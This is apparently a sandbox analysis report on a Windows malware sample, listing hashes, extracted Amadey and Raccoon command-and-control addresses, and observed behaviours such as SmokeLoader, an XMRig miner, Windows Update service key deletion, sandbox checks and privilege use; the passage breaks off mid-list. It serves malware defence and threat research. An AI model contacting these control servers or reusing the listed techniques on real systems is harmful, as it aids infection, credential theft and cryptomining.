Analysis
-
max time kernel
151s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
31-01-2023 08:50
Static task
static1
Behavioral task
behavioral1
Sample
83baf716c50b90d398e1285d0c8c04c8.exe
Resource
win7-20220812-en
General
-
Target
83baf716c50b90d398e1285d0c8c04c8.exe
-
Size
4.5MB
-
MD5
83baf716c50b90d398e1285d0c8c04c8
-
SHA1
f3fcfe9bc9979ee7e3788507d10499d031df4c5c
-
SHA256
2c18cc487d7d1078460dce7e68108cb99eab6cb9ee1955ca4df3b2376f0a0e8b
-
SHA512
fcdfa7df6a6a454f95c34a6a25aef620d3caa055bf9332579f31ed63990534532c93918ac9ffca698912cb0eb123f31c58f46e78e912cfaa758f34f0c9e84213
-
SSDEEP
98304:XNuy0rzmaXuKBh0MiS+dOUOTvwuw8/VnZaSavvETlCC:duyGKZKBh0M6ObT19Z/u3
Malware Config
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
raccoon
04f8fa0bf52b1b98a127f6deeac54f84
http://94.131.3.70/
http://83.217.11.11/
http://83.217.11.13/
http://83.217.11.14/
http://45.15.156.222/
Signatures
-
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1428-200-0x00000000004A0000-0x00000000004A9000-memory.dmp family_smokeloader -
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2240 4020 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1696 4020 rundll32.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
XandETC.exeupdater.execonhost.exedescription pid process target process PID 4648 created 2596 4648 XandETC.exe Explorer.EXE PID 4648 created 2596 4648 XandETC.exe Explorer.EXE PID 4648 created 2596 4648 XandETC.exe Explorer.EXE PID 4648 created 2596 4648 XandETC.exe Explorer.EXE PID 4648 created 2596 4648 XandETC.exe Explorer.EXE PID 3560 created 2596 3560 updater.exe Explorer.EXE PID 3560 created 2596 3560 updater.exe Explorer.EXE PID 3560 created 2596 3560 updater.exe Explorer.EXE PID 3560 created 2596 3560 updater.exe Explorer.EXE PID 3560 created 2596 3560 updater.exe Explorer.EXE PID 760 created 2596 760 conhost.exe Explorer.EXE PID 3560 created 2596 3560 updater.exe Explorer.EXE PID 3560 created 2596 3560 updater.exe Explorer.EXE -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/1384-297-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp xmrig behavioral2/memory/1384-299-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 135 1264 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 15 IoCs
Processes:
Player3.exepb1111.exeddli.exenbveek.exebirges.exeddli.exepb1111.exerandom.exerandom.exeXandETC.exenbveek.exeChromeSetup.exe8D9A.exeupdater.exenbveek.exepid process 1932 Player3.exe 804 pb1111.exe 3708 ddli.exe 3984 nbveek.exe 5004 birges.exe 4528 ddli.exe 2976 pb1111.exe 2368 random.exe 1932 random.exe 4648 XandETC.exe 3700 nbveek.exe 1428 ChromeSetup.exe 2564 8D9A.exe 3560 updater.exe 1648 nbveek.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/1384-297-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp upx behavioral2/memory/1384-299-0x00007FF78F0E0000-0x00007FF78F8D4000-memory.dmp upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\pb1111.exe vmprotect C:\Users\Admin\AppData\Local\Temp\pb1111.exe vmprotect behavioral2/memory/804-147-0x0000000140000000-0x0000000140618000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe vmprotect C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe vmprotect behavioral2/memory/2976-180-0x0000000140000000-0x000000014061A000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
nbveek.exeddli.exerandom.exe83baf716c50b90d398e1285d0c8c04c8.exePlayer3.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation ddli.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 83baf716c50b90d398e1285d0c8c04c8.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Player3.exe -
Loads dropped DLL 5 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exerundll32.exepid process 4884 rundll32.exe 832 rundll32.exe 4612 rundll32.exe 2116 rundll32.exe 1264 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
birges.exerundll32.exeupdater.exedescription pid process target process PID 5004 set thread context of 2712 5004 birges.exe jsc.exe PID 1264 set thread context of 3380 1264 rundll32.exe rundll32.exe PID 3560 set thread context of 760 3560 updater.exe conhost.exe PID 3560 set thread context of 1384 3560 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.exeXandETC.exeupdater.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1524 sc.exe 4876 sc.exe 4660 sc.exe 4148 sc.exe 4336 sc.exe 1016 sc.exe 2752 sc.exe 5004 sc.exe 3676 sc.exe 760 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2460 4884 WerFault.exe rundll32.exe 4564 832 WerFault.exe rundll32.exe 4856 2116 WerFault.exe rundll32.exe 3400 2564 WerFault.exe 8D9A.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ChromeSetup.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe -
Checks processor information in registry 2 TTPs 17 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
rundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Processes:
Explorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Modifies registry class 30 IoCs
Processes:
Explorer.EXErundll32.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 820074001c0043465346160031000000000000000000100041707044617461000000741a595e96dfd3488d671733bcee28bac5cdfadf9f6756418947c5c76bc0b67f400009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004100700070004400610074006100000042000000 Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4e003100000000003f56794e100054656d7000003a0009000400efbe0c55ec983f56804e2e0000000000000000000000000000000000000000000000000029815500540065006d007000000014000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 50003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f44471a0359723fa74489c55595fe6b30ee0000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 86 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 2596 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
birges.exeChromeSetup.exeExplorer.EXEpid process 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 5004 birges.exe 1428 ChromeSetup.exe 1428 ChromeSetup.exe 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE 2596 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 2596 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
ChromeSetup.exepid process 1428 ChromeSetup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
birges.exeExplorer.EXEpowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 5004 birges.exe Token: SeShutdownPrivilege 2596 Explorer.EXE Token: SeCreatePagefilePrivilege 2596 Explorer.EXE Token: SeShutdownPrivilege 2596 Explorer.EXE Token: SeCreatePagefilePrivilege 2596 Explorer.EXE Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeShutdownPrivilege 3608 powercfg.exe Token: SeCreatePagefilePrivilege 3608 powercfg.exe Token: SeShutdownPrivilege 1388 powercfg.exe Token: SeCreatePagefilePrivilege 1388 powercfg.exe Token: SeShutdownPrivilege 3348 powercfg.exe Token: SeCreatePagefilePrivilege 3348 powercfg.exe Token: SeShutdownPrivilege 2848 powercfg.exe Token: SeCreatePagefilePrivilege 2848 powercfg.exe Token: SeIncreaseQuotaPrivilege 4800 powershell.exe Token: SeSecurityPrivilege 4800 powershell.exe Token: SeTakeOwnershipPrivilege 4800 powershell.exe Token: SeLoadDriverPrivilege 4800 powershell.exe Token: SeSystemProfilePrivilege 4800 powershell.exe Token: SeSystemtimePrivilege 4800 powershell.exe Token: SeProfSingleProcessPrivilege 4800 powershell.exe Token: SeIncBasePriorityPrivilege 4800 powershell.exe Token: SeCreatePagefilePrivilege 4800 powershell.exe Token: SeBackupPrivilege 4800 powershell.exe Token: SeRestorePrivilege 4800 powershell.exe Token: SeShutdownPrivilege 4800 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeSystemEnvironmentPrivilege 4800 powershell.exe Token: SeRemoteShutdownPrivilege 4800 powershell.exe Token: SeUndockPrivilege 4800 powershell.exe Token: SeManageVolumePrivilege 4800 powershell.exe Token: 33 4800 powershell.exe Token: 34 4800 powershell.exe Token: 35 4800 powershell.exe Token: 36 4800 powershell.exe Token: SeIncreaseQuotaPrivilege 4800 powershell.exe Token: SeSecurityPrivilege 4800 powershell.exe Token: SeTakeOwnershipPrivilege 4800 powershell.exe Token: SeLoadDriverPrivilege 4800 powershell.exe Token: SeSystemProfilePrivilege 4800 powershell.exe Token: SeSystemtimePrivilege 4800 powershell.exe Token: SeProfSingleProcessPrivilege 